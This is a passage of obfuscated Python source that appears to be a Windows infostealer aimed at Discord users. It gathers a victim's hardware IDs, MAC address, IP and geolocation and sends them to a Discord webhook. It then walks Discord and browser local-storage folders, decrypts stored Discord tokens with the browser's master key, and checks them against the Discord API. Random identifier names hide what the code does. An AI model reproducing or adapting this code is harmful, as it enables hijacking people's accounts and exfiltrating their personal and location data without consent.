    try: BTZZQQYZGVXCATRUVCUQTMVYVENTOYIUXDUGKQZWXMEHGVLOXJEDMDFUGJGABXDGHTDIFVKRAZLVKZBYQANYPLZSHRLUL = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: BTZZQQYZGVXCATRUVCUQTMVYVENTOYIUXDUGKQZWXMEHGVLOXJEDMDFUGJGABXDGHTDIFVKRAZLVKZBYQANYPLZSHRLUL = "None"

    try: MXFLVYBIVEVCQHDJECSKBQNAEPHUAKUXKTPECSWBVPBUEXONAVZMOQTREZIOHEIRZTR = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
    except: MXFLVYBIVEVCQHDJECSKBQNAEPHUAKUXKTPECSWBVPBUEXONAVZMOQTREZIOHEIRZTR = "None"

    try: DSRVRZIOATQXPJVIJQRVYZMXUDLSNEPLDLRQTPZVACEQBBAENFWODLIHVOWFUEZ = round(psutil.virtual_memory().total / (1024**3), 2)
    except: DSRVRZIOATQXPJVIJQRVYZMXUDLSNEPLDLRQTPZVACEQBBAENFWODLIHVOWFUEZ = "None"

    try: FTMANNMQQQGLPMPSXEILEPMMISSGQXXEJWTJHWDJKOKOWBAFWNXDAIZKAZELFECMEEXKZAQVZCG = platform.processor()
    except: FTMANNMQQQGLPMPSXEILEPMMISSGQXXEJWTJHWDJKOKOWBAFWNXDAIZKAZELFECMEEXKZAQVZCG = "None"

    try: QJVOOQEOFYLCAMKHQVGYSCAIZGLLLQQSDCZXPIMETSVCDDTEAMIPBJEWOKCVHDGBUPWDNNFVAMNDSWVDMUDULQVPIGKJDBCA = psutil.cpu_count(logical=False)
    except: QJVOOQEOFYLCAMKHQVGYSCAIZGLLLQQSDCZXPIMETSVCDDTEAMIPBJEWOKCVHDGBUPWDNNFVAMNDSWVDMUDULQVPIGKJDBCA = "None"

    try: NPXUDSYMFKSDIYLJJIBSLWCOVWNMJCOWWBKAFIYRVWPBLLQAIIAFDYXCBMVCWVOBGPSVTTNHLTTTOQH = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: NPXUDSYMFKSDIYLJJIBSLWCOVWNMJCOWWBKAFIYRVWPBLLQAIIAFDYXCBMVCWVOBGPSVTTNHLTTTOQH = "None"

    try:
        CLYCCXALLPKYOZSWLXSHDSCDNMKCXTJAPUNHYIBCFTLIJCCDCS = []
        RZCTSWRJABUIRHPQLRANOTSCZJNHGEPSHZFROTXGXWVUDGJIXVOO = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if RZCTSWRJABUIRHPQLRANOTSCZJNHGEPSHZFROTXGXWVUDGJIXVOO & 1:
                ORZNOIIWBTLNXXVGLHDCFXGXBBVVCSMUAQHFXCBSLRMTSTZTGMQINVFVBGYGMPFSQLEVKCMYTYMGTKSNMNZOHGEDRZIWSH = v4r_letter + ":\\"
                try:
                    DSOFUCSHHUMDBACPVITEOUKAZARMHJIVHRBSXGLRJVBNEVVZOCGTVWQYPNGYASEHGULBQUIOXRAMVSKWSXGLAAG = ctypes.c_ulonglong(0)
                    DSRNKZKWPZAHMCLTGPMGYSTUGANVHZNRRDQNFODRBMYKUXKMMTJXWPEOBNMSGQURKJZPFT = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(ORZNOIIWBTLNXXVGLHDCFXGXBBVVCSMUAQHFXCBSLRMTSTZTGMQINVFVBGYGMPFSQLEVKCMYTYMGTKSNMNZOHGEDRZIWSH), None, ctypes.pointer(DSRNKZKWPZAHMCLTGPMGYSTUGANVHZNRRDQNFODRBMYKUXKMMTJXWPEOBNMSGQURKJZPFT), ctypes.pointer(DSOFUCSHHUMDBACPVITEOUKAZARMHJIVHRBSXGLRJVBNEVVZOCGTVWQYPNGYASEHGULBQUIOXRAMVSKWSXGLAAG))
                    QOZIICCPVUQBTJKGREPDRLPOZUQDRVDYHLZFQGRWYJWJTKJSTAWTAPVPUACWKUONPJSSYUCLOBTJSBCAVNPTCCJTKTDWTSU = DSRNKZKWPZAHMCLTGPMGYSTUGANVHZNRRDQNFODRBMYKUXKMMTJXWPEOBNMSGQURKJZPFT.value
                    MRXETAUPDZEKGPTHIZCSOXLWSNXYYNQJDHIRYXBFJCPFQGIWCL = DSOFUCSHHUMDBACPVITEOUKAZARMHJIVHRBSXGLRJVBNEVVZOCGTVWQYPNGYASEHGULBQUIOXRAMVSKWSXGLAAG.value
                    BXIOJSOJKYRQGEJLWCTPGVSITJBDOXZPQAXXXKJQCAKWYZFDHTOAXOSCRQZCUTQFVKAFENLQPNMLPRPXI = QOZIICCPVUQBTJKGREPDRLPOZUQDRVDYHLZFQGRWYJWJTKJSTAWTAPVPUACWKUONPJSSYUCLOBTJSBCAVNPTCCJTKTDWTSU - MRXETAUPDZEKGPTHIZCSOXLWSNXYYNQJDHIRYXBFJCPFQGIWCL
                    EPATRDOOVAROFANMXLUKAIJORVRZWQEPJKETZLEVEBAFTKLOKINSLGMFNAZALQMJJSBRDYBRZJXEXCJVVYNCKKJHMBMPCKT = win32api.GetVolumeInformation(ORZNOIIWBTLNXXVGLHDCFXGXBBVVCSMUAQHFXCBSLRMTSTZTGMQINVFVBGYGMPFSQLEVKCMYTYMGTKSNMNZOHGEDRZIWSH)[0]
                    drive = {
                        'drive': ORZNOIIWBTLNXXVGLHDCFXGXBBVVCSMUAQHFXCBSLRMTSTZTGMQINVFVBGYGMPFSQLEVKCMYTYMGTKSNMNZOHGEDRZIWSH,
                        'total': QOZIICCPVUQBTJKGREPDRLPOZUQDRVDYHLZFQGRWYJWJTKJSTAWTAPVPUACWKUONPJSSYUCLOBTJSBCAVNPTCCJTKTDWTSU,
                        'free': MRXETAUPDZEKGPTHIZCSOXLWSNXYYNQJDHIRYXBFJCPFQGIWCL,
                        'used': BXIOJSOJKYRQGEJLWCTPGVSITJBDOXZPQAXXXKJQCAKWYZFDHTOAXOSCRQZCUTQFVKAFENLQPNMLPRPXI,
                        'name': EPATRDOOVAROFANMXLUKAIJORVRZWQEPJKETZLEVEBAFTKLOKINSLGMFNAZALQMJJSBRDYBRZJXEXCJVVYNCKKJHMBMPCKT,
                    }
                    CLYCCXALLPKYOZSWLXSHDSCDNMKCXTJAPUNHYIBCFTLIJCCDCS.append(drive)
                except:
                    ()
            RZCTSWRJABUIRHPQLRANOTSCZJNHGEPSHZFROTXGXWVUDGJIXVOO >>= 1

        ZJQGHRPQSNWDXPLHQVGXOXOJIAZNPTNLVFASBDFLTPBCYEEKZKMGHNXXASMMDYKKX = "{:<7} {:<10} {:<10} {:<10} {:<20}\n".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in CLYCCXALLPKYOZSWLXSHDSCDNMKCXTJAPUNHYIBCFTLIJCCDCS:
            QWPJBHUTTXXEPDPIBZAOJKWOENFXEPVMHZFOSPMCNJAPQQNYKVFFKNWVXSETQKPOPCDKRGFXRMAEPFFCF = (v4r_drive['used'] / v4r_drive['total']) * 100
            MRXETAUPDZEKGPTHIZCSOXLWSNXYYNQJDHIRYXBFJCPFQGIWCL_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            QOZIICCPVUQBTJKGREPDRLPOZUQDRVDYHLZFQGRWYJWJTKJSTAWTAPVPUACWKUONPJSSYUCLOBTJSBCAVNPTCCJTKTDWTSU_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            QWPJBHUTTXXEPDPIBZAOJKWOENFXEPVMHZFOSPMCNJAPQQNYKVFFKNWVXSETQKPOPCDKRGFXRMAEPFFCF_str = "{:.2f}%".format(QWPJBHUTTXXEPDPIBZAOJKWOENFXEPVMHZFOSPMCNJAPQQNYKVFFKNWVXSETQKPOPCDKRGFXRMAEPFFCF)
            ZJQGHRPQSNWDXPLHQVGXOXOJIAZNPTNLVFASBDFLTPBCYEEKZKMGHNXXASMMDYKKX += "{:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   MRXETAUPDZEKGPTHIZCSOXLWSNXYYNQJDHIRYXBFJCPFQGIWCL_gb,
                                                                   QOZIICCPVUQBTJKGREPDRLPOZUQDRVDYHLZFQGRWYJWJTKJSTAWTAPVPUACWKUONPJSSYUCLOBTJSBCAVNPTCCJTKTDWTSU_gb,
                                                                   QWPJBHUTTXXEPDPIBZAOJKWOENFXEPVMHZFOSPMCNJAPQQNYKVFFKNWVXSETQKPOPCDKRGFXRMAEPFFCF_str,
                                                                   v4r_drive['name'])
    except:
        ZJQGHRPQSNWDXPLHQVGXOXOJIAZNPTNLVFASBDFLTPBCYEEKZKMGHNXXASMMDYKKX = """Drive:  Free:      Total:     Use:       Name:       
None    None       None       None       None     
"""

    try:
        def IsPortable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if IsPortable():
            LAENFYNYOBQQJJVVKARWQPJPBCYPUZGRUVXQRRXMQYPVYBPVQCHRMPVYWNIGIXUEZTANTIHASAVZAABMCY = 'Pc Portable'
        else:
            LAENFYNYOBQQJJVVKARWQPJPBCYPUZGRUVXQRRXMQYPVYBPVQCHRMPVYWNIGIXUEZTANTIHASAVZAABMCY = 'Pc Fixed'
    except:
        LAENFYNYOBQQJJVVKARWQPJPBCYPUZGRUVXQRRXMQYPVYBPVQCHRMPVYWNIGIXUEZTANTIHASAVZAABMCY = "None"

    try: PVHXXYGMXOBPMBLUQYZHWEEXVMIIOXAKXOSBTOQDGNNNDKLYQFUEAJBBQMGIODGNBWWK = len(screeninfo.get_monitors())
    except: PVHXXYGMXOBPMBLUQYZHWEEXVMIIOXAKXOSBTOQDGNNNDKLYQFUEAJBBQMGIODGNBWWK = "None"

    embed = Embed(title=f'System Info {TGYOUIFMOWKYZIOUPHVPRESMWIAADIZAXDPGRUJRHHQVDLSQEWTQDIHYMZBIQSQLOQBAVYWWLBBOWBNN}:', color=RMJJMOUXTBZJYWBWEOIPOWSROASXCPITCQRFHZCMWGHOCMVPRTUVL)

    embed.add_field(name=":bust_in_silhouette: User Pc:", value=f"""```Hostname    : {MWURGOLWUVQRULJWBOYUHSIVTLUQUYEMHQUOIXGRJBBLRVQZNWDGNFLCMOKCKRCWGJBFJDWGHVLSNAWI}
Username    : {UQOPOUMYMRDAHQLWHYSVMGQAXSFKXFOHEKEINQGTNMFDETSWCTYYIMBWIFZZHRUSSHNDJQCKGBYDSRWHHPOYM}
DisplayName : {QFUJFVIZZJBJFZONNNRSFJLVIRUHBKFAPCJESHELJYGELHCCETNATRMSFJVCCJBUCHGRENTCPHZCF}```""", inline=False)

    embed.add_field(name=":computer: System:", value=f"""```Plateform     : {LAENFYNYOBQQJJVVKARWQPJPBCYPUZGRUVXQRRXMQYPVYBPVQCHRMPVYWNIGIXUEZTANTIHASAVZAABMCY}
Exploitation  : {GVPHGVSNRENMHESWZBSSFFELDVIYFCCZDNPECMLVFGWLLFUJNJNTWTHKMAOCXLVXNFXGTXXFAREDOJ} {CENXTQFANDZPHPISXIGPEIZRRUXPAAZUSBTRFDDUYKUQOJFVVYR}
Screen Number : {PVHXXYGMXOBPMBLUQYZHWEEXVMIIOXAKXOSBTOQDGNNNDKLYQFUEAJBBQMGIODGNBWWK}

HWID : {MXFLVYBIVEVCQHDJECSKBQNAEPHUAKUXKTPECSWBVPBUEXONAVZMOQTREZIOHEIRZTR}
MAC  : {BTZZQQYZGVXCATRUVCUQTMVYVENTOYIUXDUGKQZWXMEHGVLOXJEDMDFUGJGABXDGHTDIFVKRAZLVKZBYQANYPLZSHRLUL}
CPU  : {FTMANNMQQQGLPMPSXEILEPMMISSGQXXEJWTJHWDJKOKOWBAFWNXDAIZKAZELFECMEEXKZAQVZCG}, {QJVOOQEOFYLCAMKHQVGYSCAIZGLLLQQSDCZXPIMETSVCDDTEAMIPBJEWOKCVHDGBUPWDNNFVAMNDSWVDMUDULQVPIGKJDBCA} Core
GPU  : {NPXUDSYMFKSDIYLJJIBSLWCOVWNMJCOWWBKAFIYRVWPBLLQAIIAFDYXCBMVCWVOBGPSVTTNHLTTTOQH}
RAM  : {DSRVRZIOATQXPJVIJQRVYZMXUDLSNEPLDLRQTPZVACEQBBAENFWODLIHVOWFUEZ}Go```""", inline=False)

    embed.add_field(name=":satellite: Ip:", value=f"""```Public : {AKUYUPHZBZDZZQGNDZKGHKPGKCDHEHNFPKBLLZXCPTSJMMZHYYQIILJSPEITNEGWVHHXJUWUUXSRXINILDFRVSBHKUIUZXJ}
Local  : {PCBTMSQYGTAZQZDDYTDNGZONCLRSQTOWORABRAZHVVZPLFCDTBJTNLCYKJFYMQDNNWMQFJJFQVRKAXDFOVUCJAYJ}
Isp    : {CQAGZRLBQKXNLMABYDEPJVQIBUOZKAEGMPIYGFTECZUSQYZJVLWZDYTVCYUZXNJZNJXJSXSCSYRCHSDHZ}
Org    : {KFKCTYMCVXKZXUOSUUUBNVJKVDAIVTWSDQLHKKVPVWKBZBVEEFBWMROUEUKERUZDLJWNDDXFAHJPHTHTQWIS}
As     : {WLCBETUWQYTGCGKANEZIATKVXIHFSXPBNMZKLAQIGFCWIMKECWZNVTN}```""", inline=False)

    embed.add_field(name=":minidisc: Disk:", value=f"""```{ZJQGHRPQSNWDXPLHQVGXOXOJIAZNPTNLVFASBDFLTPBCYEEKZKMGHNXXASMMDYKKX}```""", inline=False)

    embed.add_field(name=":map: Location:", value=f"""```Country   : {RQTSMDSHZCAUKVAEOHWDHHGGXRGSPABBEEVCUAWGSJECFNHRRKLVATZMWDREBBNWWDCKOVQNNBFYKV} ({RQTSMDSHZCAUKVAEOHWDHHGGXRGSPABBEEVCUAWGSJECFNHRRKLVATZMWDREBBNWWDCKOVQNNBFYKV_code})
Region    : {KWLURGWPCALKRPIDKLBTEUSKBTMVEIMTCQZGIDMWZTSPZPLUBZKUJDYADWTIUBTGKVSIDOKOUFWOIWALCDYEHTMY} ({KWLURGWPCALKRPIDKLBTEUSKBTMVEIMTCQZGIDMWZTSPZPLUBZKUJDYADWTIUBTGKVSIDOKOUFWOIWALCDYEHTMY_code})
Zip       : {VEVYTXWDTWTXNOEQDUIKLCATGCFJABNBYLEQNXQVVLCXKYIKUVCYCHIZCAWUWDQOHQKEYPENXPGYWHQXNAX}
City      : {BUWXHWTSUVUZMTVZJZJRANQWKEXVSLVEXPFNDXIHCDDBQYTNAKPODCUKEXOOTDUECCQBPYEPALFSDQKRIPINXCTSHNYNLYFCUON}
Timezone  : {IQJFWKRUBTKQGLQZGCWFYRXJUSFRBIMJVIKZCJMUVIEOVOVMZTHMWKEAYLLWBE}
Latitude  : {FOHITUHLNMQFPMJYORXSRBBDIBGPWDLIFXCSSOXUZAOYSXLHFBOHPRLWPUGCMVFPQXZPMK}
Longitude : {DQBTEDHUMOEMIJRKWLCBONICLDRHQXPHRDDKXHIBSUIEBWIBSEIGYNDPSDXRNXQPCJVPPRCQ}```""", inline=False)


    embed.set_footer(text=ILDRTXVCRNWREWBTBHGYUDNLNATSSHGVKKJGTOVFIEONBRWNVPZQMFZAARZWDVWYGASSOCMHQCWHDNBGKNCZIID, icon_url=COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF)

    ODEFLRZOMMYJQBKBZAFWCMMFFJJQNHABPWHPSRAYQXTZZQYOYTDSXIHKMDCBLELQPTWUSJ = SyncWebhook.from_url(JWYVDZHULQYWOKJLEHQDUESUOVMLMYRUDBDTLOWPXWFUXKESODFHFUQJVZIVWAEAIQFRPAONONS)
    ODEFLRZOMMYJQBKBZAFWCMMFFJJQNHABPWHPSRAYQXTZZQYOYTDSXIHKMDCBLELQPTWUSJ.send(embed=embed, username=FYFMYAFLJDYUCGHTYCCAPJNVUNHWJWIQAXESUCAINNDVRADDNAYRYOGMTXE, avatar_url=COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF)

def RYPJBCRTOJDEHHXGNROCNLTAOJNGBBCUFTIXDFLXIOCDQNTJEXWTXIFCJOQXPHOZZUKAMSBLPVFHGRDBLVKQHTOETQJAN():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def ILCKXZJUMAEKATVVHJIUCNFVEGBDCMMEHKYYTOCPZTYVQXIJKZXDPQIWHWRFDUKNSNIIPOINVFXLQGPYCEZVZYCEVEQPQNQUX():
        XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC = "https://discord.com/api/v9/users/@me"
        JJEAHYZSHXJOJQEIKERRVPEAQGWYYDSXYIRFXKSRYPCSDBFHXYFSGIRKAKXCMNSSOWQGOZSHHIVTAOAGYSWPUUDLHDGK = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        JJEAHYZSHXJOJQEIKERRVPEAQGWYYDSXYIRFXKSRYPCSDBFHXYFSGIRKAKXCMNSSOWQGOZSHHIVTAOAGYSWPUUDLHDGK_enc = r"dQw4w9WgXcQ:[^\"]*"
        HYHKKFGSWUUQKSVXUUDSAFXFGYCCGCGIZTAMYALSQQWRCENABXEWTUECWYFTPOTGHCTJQKRFTTTXG = []
        VJRRLCSKUWLQCUTIQRLRJKIVYHHNNVWUKCLQYUOTHASEKTWEQX = []
        TKQKIQMJYIZXGVCRZXSLPULYEJUIQNMOIOFBAYRKGYOXDQFYKOKU = {}

        MWNNNNZWTFPJWMANBBNPAIHCGHLHNGNSAJNHRIWTKETHGOMTOYTFPIAHTRABQMFKSQBRMXVWRFXWBQGJYKLMAVIPLPTTOYPGHPRZ = {
            'Discord': UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': DKYQLBUMQUQEOXNHUAQPOQBTHJDETQCQASWDWBTYTAHUFRVRPKACLNWFYXYRWWNBNXLRDRHPFGOYKRKJGSXPVJYGSCLFQZL + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for BRPFFQDIEXDNEZDNTZQJYXPROBGDNXKAKBJEJVOQUQUEHFJFRXRAEGUAIURVRCVPQQKTZJHXVEPIXETFSJYRYCTAM, NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH in MWNNNNZWTFPJWMANBBNPAIHCGHLHNGNSAJNHRIWTKETHGOMTOYTFPIAHTRABQMFKSQBRMXVWRFXWBQGJYKLMAVIPLPTTOYPGHPRZ.items():
            if not os.path.exists(NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH):
                continue
            HOGAKFUXJWCOJAYYFCEQZHNPLUQSUMIOCYGIEDKOIFLCLTNUEQDVINEFNOXTTDCDPKN = BRPFFQDIEXDNEZDNTZQJYXPROBGDNXKAKBJEJVOQUQUEHFJFRXRAEGUAIURVRCVPQQKTZJHXVEPIXETFSJYRYCTAM.replace(" ", "").lower()
            if "cord" in NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH:
                if not os.path.exists(UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + f'\\{HOGAKFUXJWCOJAYYFCEQZHNPLUQSUMIOCYGIEDKOIFLCLTNUEQDVINEFNOXTTDCDPKN}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{NXMHGHYBWUTTFAQCTEKQSMWAEJATEDEHCUBXJNGBQARJPIINJHPMXTOXIH}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(JJEAHYZSHXJOJQEIKERRVPEAQGWYYDSXYIRFXKSRYPCSDBFHXYFSGIRKAKXCMNSSOWQGOZSHHIVTAOAGYSWPUUDLHDGK_enc, v4r_line.strip()):
                                VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU = IFHYRBRBYXXZSXCRCJRUXRQHFICHOEMTKMYZUPMOXNGYRJDXWFQSUSTBCJXPLIATCWECDFAAZPYPQEYPTVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), WUUWAOEXTKSDOUKCJWOJIWBXWLPVVAEEVSVCCORVXRGFSPEZSMSSHCCRWZNOQTXDBGDLOVLMFSKRVB(UFZPKGXXDDSRPTQWDCTBJGPPTRLCFFUSRJUYSTNCLGLACKRNOVHMNGNTMPHFKBTSWXAIHBIAVGPYKUYEDDVAJUQHSYHNAY + f'\\{HOGAKFUXJWCOJAYYFCEQZHNPLUQSUMIOCYGIEDKOIFLCLTNUEQDVINEFNOXTTDCDPKN}\\Local State'))
                                if FAYBTNKWANOIPMMXHJWMQPTVMEUXSLFNSWQLWDBSAUZUTNDWWAWHCKUYWQDRFOUNGMZENGXIICHZNMWPXPQG(VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU, XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC):
                                    MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ = requests.get(XJWRSIPAWOHAXMJIEJTJUYOUODNLXTZGKOQJMRHWERRZGOWZMFFMMVTDRQUWXFHAZCFMTMHLUKRMRSGVGVTYVAHC, headers={'Authorization': VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU}).json()['id']
                                    if MGBFEVRMTLLPBSSMDBEESVSMBWSTDXKCOHQPCAQNCWQHHCDTBHVFZJGPAXLAVYKMIFKQXUZKCZDCIPZVOCZ not in VJRRLCSKUWLQCUTIQRLRJKIVYHHNNVWUKCLQYUOTHASEKTWEQX:
                                        HYHKKFGSWUUQKSVXUUDSAFXFGYCCGCGIZTAMYALSQQWRCENABXEWTUECWYFTPOTGHCTJQKRFTTTXG.append(VQKYURAEZTQJMYMEZXZIRJGKOMGAKWVBUSEOKHOZKSZVUCYMCPVYIKBFU)
